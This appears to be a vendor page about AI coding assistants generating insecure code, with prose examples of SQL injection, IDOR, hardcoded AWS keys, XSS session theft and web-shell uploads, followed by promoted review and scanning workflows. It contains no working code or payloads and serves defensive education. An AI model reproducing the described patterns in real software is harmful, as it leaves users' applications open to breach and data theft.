Insecure Code
This is the "Trojan Horse" pain point. The AI, in its quest to provide a functional answer, will often generate code that is riddled with classic, well-known security vulnerabilities. It's "security-blind" by default, trained on a massive corpus of public internet code—which is itself notoriously insecure. Without explicit, security-focused guardrails, the AI will happily and confidently hand you code that opens a gaping hole in your application, passing a quick review because it "looks like it works."
An AI's primary objective is to generate code that functionally satisfies the prompt, not code that is secure. It lacks the "adversarial mindset" of a security engineer and will naively replicate dangerous patterns it learned from its training data. This includes failing to sanitize user inputs, forgetting to implement authorization checks, or hardcoding sensitive data. These vulnerabilities are invisible to a standard functional review, creating a "stealth" security debt that attackers can easily exploit.
This is a direct and immediate threat to the business. The impact goes far beyond a simple bug; it can lead to catastrophic security breaches, massive data exfiltration (of customer data or IP), and severe compliance violations (e.g., GDPR, HIPAA, PCI). The cost of a breach is enormous, measured not just in emergency remediation costs and regulatory fines, but in the permanent loss of customer trust and brand reputation.
The Classic SQL Injection (SQLi)
A developer prompts, "write a function to get a user from the database by userId." The AI generates a "working" function that directly concatenates the userId variable into the SQL string, creating a textbook SQL injection vulnerability.
The "Forgot to Check" Vulnerability (IDOR)
The AI generates a "get order details" endpoint (/api/orders/:orderId) but forgets to add the authentication or authorization check to verify that the logged-in user actually owns that order. This allows any user to view any other user's order just by guessing the ID.
The "Hardcoded Secret" Leak
You ask the AI to "write code to connect to the S3 bucket." The AI generates the code and helpfully includes placeholder (or worse, real if it saw them in context) AWS_ACCESS_KEY and AWS_SECRET_KEY variables hardcoded directly in the file, which are then committed to source control.
Cross-Site Scripting (XSS)
The AI generates code to "display a user's comment on the page" but fails to sanitize the comment string before rendering it as HTML, allowing an attacker to inject malicious <script> tags that steal other users' session cookies.
The Insecure File Upload
The AI generates a "file upload" endpoint that fails to validate the file type or sanitize the filename, allowing an attacker to upload an executable web shell (.php, .aspx) and take over the server.
The problem isn't the AI; it's the lack of a human-in-the-loop verification and governance system. These workflows are the perfect antidote.
Security Guardrails
View workflow →The Pain Point It Solves
This workflow directly attacks the "Trojan Horse" problem by requiring security scans (SAST, secret scanning) before merge and enforcing security-focused code review checklists. Instead of allowing security-blind AI code to pass a quick functional review, this workflow ensures that security vulnerabilities are caught before they enter the codebase.
Why It Works
It enforces security scanning. By requiring security scans (SAST, secret scanning) before merge, enforcing security-focused code review checklists that check for OWASP Top 10 vulnerabilities, and running automated security tests, this workflow ensures that SQL injection, XSS, hardcoded secrets, and other security vulnerabilities are caught before they can be exploited. This prevents the AI from confidently handing you code that opens gaping holes in your application.
Release Readiness Runbook
View workflow →The Pain Point It Solves
This workflow addresses the "stealth security debt" problem by running smoke tests covering security scans before the release window. Instead of allowing insecure code to reach production, this workflow ensures that all security guardrails have been cleared before release.
Why It Works
It validates security before release. By running smoke tests covering code quality, security scans, and schema checks before the release window, capturing validator outputs (pass/fail) and storing them with release notes, and requiring security sign-off before deployment, this workflow ensures that insecure code cannot reach production even if it passes functional review. This prevents catastrophic security breaches and data exfiltration.
Want to prevent this pain point?
Explore our workflows and guardrails to learn how teams address this issue.
Engineering Leader & AI Guardrails Leader. Creator of Engify.ai, helping teams operationalize AI through structured workflows and guardrails based on real production incidents.